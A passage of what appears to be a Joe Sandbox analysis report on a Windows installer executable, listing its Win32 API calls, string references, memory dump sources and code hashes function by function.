                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                    • String ID: : Completed$N
                                                                                                    • API String ID: 3103080414-2140067464
                                                                                                    • Opcode ID: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
                                                                                                    • Instruction ID: 9df2d5718f770f504e0a3d1761d641f71338e4c23cddda8a7d5dd424fc5a0579
                                                                                                    • Opcode Fuzzy Hash: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
                                                                                                    • Instruction Fuzzy Hash: 2A61B1B1A40208BFDF109F60DD45F6A3B69FB84715F10802AFB05BA2D1D7B8A951CF99
                                                                                                    APIs
                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                    • DrawTextA.USER32(00000000,Bysamfund,000000FF,00000010,00000820), ref: 00401156
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: Bysamfund$F
                                                                                                    • API String ID: 941294808-3307120823
                                                                                                    • Opcode ID: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
                                                                                                    • Instruction ID: 8cb536a74e8a95367a30f9a40e648d77c0c0257b52f8be6e86691cf172308c2f
                                                                                                    • Opcode Fuzzy Hash: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
                                                                                                    • Instruction Fuzzy Hash: 1D417B71800249AFCF058FA5DE459AF7BB9FF45314F00802AF991AA1A0C7789A55DFA4
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405ED4,?,?), ref: 00405D74
                                                                                                    • GetShortPathNameA.KERNEL32(?,007A12F8,00000400), ref: 00405D7D
                                                                                                      • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                      • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                                                                    • GetShortPathNameA.KERNEL32(?,007A16F8,00000400), ref: 00405D9A
                                                                                                    • wsprintfA.USER32 ref: 00405DB8
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007A16F8,C0000000,00000004,007A16F8,?,?,?,?,?), ref: 00405DF3
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E02
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E3A
                                                                                                    • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,007A0EF8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405E90
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EA1
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EA8
                                                                                                      • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dP5z8RpEyQ.exe,80000000,00000003), ref: 00405C71
                                                                                                      • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                    • String ID: %s=%s$[Rename]
                                                                                                    • API String ID: 2171350718-1727408572
                                                                                                    • Opcode ID: 0b1fe35b626d56e42c997f45168692cc3ef83c098e0f1d716f4da02acec9d6b8
                                                                                                    • Instruction ID: 3bd9902b6e4cfcbbd8c27daddc785bf5092739fd3612ff4c635abc71f9dbf801
                                                                                                    • Opcode Fuzzy Hash: 0b1fe35b626d56e42c997f45168692cc3ef83c098e0f1d716f4da02acec9d6b8
                                                                                                    • Instruction Fuzzy Hash: 30312531200B156FD3206B75DD48F2B3A5CDF85754F14043AB981F62D2DB7CE9018AAD
                                                                                                    APIs
                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
                                                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
                                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
                                                                                                    • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429
                                                                                                    Strings
                                                                                                    • *?|<>/":, xrefs: 004063F7
                                                                                                    • "C:\Users\user\Desktop\dP5z8RpEyQ.exe", xrefs: 004063EB
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004063B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 589700163-1315701997
                                                                                                    • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                    • Instruction ID: 4c47756038ac22285ba0d5cec53aa64a9461198f7a7023556037c09898c6efe2
                                                                                                    • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                    • Instruction Fuzzy Hash: 5B11B6514047A129EB3216285C40B77BF888B97760F19407BE8D2722C2D77C5C5297BD
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000EB), ref: 004041DC
                                                                                                    • GetSysColor.USER32(00000000), ref: 0040421A
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404226
                                                                                                    • SetBkMode.GDI32(?,?), ref: 00404232
                                                                                                    • GetSysColor.USER32(?), ref: 00404245
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404255
                                                                                                    • DeleteObject.GDI32(?), ref: 0040426F
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404279
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                    • Instruction ID: 0c29b1994579108119522ba9b7e42ccb12df1f79812dc60d22c4570354a7e24a
                                                                                                    • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                    • Instruction Fuzzy Hash: 6021A4B16007049BCB309F78DD08B5BBBF8AF81754B14896EFD92A26E0C734E904CB54
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AC6
                                                                                                    • GetMessagePos.USER32 ref: 00404ACE
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404AE8
                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404AFA
                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                    • Instruction ID: 246458a00becd8bf3e45cced134e1bc678ff0f74541da5adfbd61824d77d36c3
                                                                                                    • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                    • Instruction Fuzzy Hash: BC015E71900219BADB00DBA4DD85BFFBBBCAF55B11F10012BBB40B61D0C7B4A941CBA4
                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00401E38
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                                                    • CreateFontIndirectA.GDI32(0040B808), ref: 00401EBA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                    • String ID: Times New Roman
                                                                                                    • API String ID: 3808545654-927190056
                                                                                                    • Opcode ID: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
                                                                                                    • Instruction ID: 57ae00d383071d6c5df03c611de82deed4414851ba4a5b5ac7ac255a7617b9b1
                                                                                                    • Opcode Fuzzy Hash: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
                                                                                                    • Instruction Fuzzy Hash: 0E019672500240AFD7006BB0AE4A79A3FF8D755301F108839F241B62F2C67804458BAC
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                                    • MulDiv.KERNEL32(000CCE2E,00000064,000CD760), ref: 00402E00
                                                                                                    • wsprintfA.USER32 ref: 00402E10
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                                                    Strings
                                                                                                    • verifying installer: %d%%, xrefs: 00402E0A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-82062127
                                                                                                    • Opcode ID: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
                                                                                                    • Instruction ID: 5b578c44cce9eb850d5b1a327d08a3d6af9bf3f213875045bca18d45615f3dab
                                                                                                    • Opcode Fuzzy Hash: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
                                                                                                    • Instruction Fuzzy Hash: 6601447064020DFBEF109F60DE09EAE3769AB04304F00803AFA06A51D0DBB899519B5D
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
                                                                                                    • GetLastError.KERNEL32 ref: 00405718
                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040572D
                                                                                                    • GetLastError.KERNEL32 ref: 00405737
                                                                                                    Strings
                                                                                                    • C:\Users\user\Desktop, xrefs: 004056C1
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004056E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                    • API String ID: 3449924974-1521822154
                                                                                                    • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                    • Instruction ID: 68da7140adab9ac89dc439175e59da9b3464284d57dce40cdacedd7e8d7715c7
                                                                                                    • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                    • Instruction Fuzzy Hash: E2011671C00219EADF00DFA1C944BEFBBB8EF04354F00403AD944B6290E7B89648DFA9
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0001C400,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2667972263-0
                                                                                                    • Opcode ID: e164bca3ed8cb23219c9b1014790a6721b2d0210796978c328ac0771c4fb54ad
                                                                                                    • Instruction ID: 541bef3258e2720658000fa94f276f2b73ea2b938264a1111491e3e624c892cf
                                                                                                    • Opcode Fuzzy Hash: e164bca3ed8cb23219c9b1014790a6721b2d0210796978c328ac0771c4fb54ad
                                                                                                    • Instruction Fuzzy Hash: BA21A072800128BBDF217FA5CE48DAE7E79EF05324F20423EF551762D1C67949418FA8
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
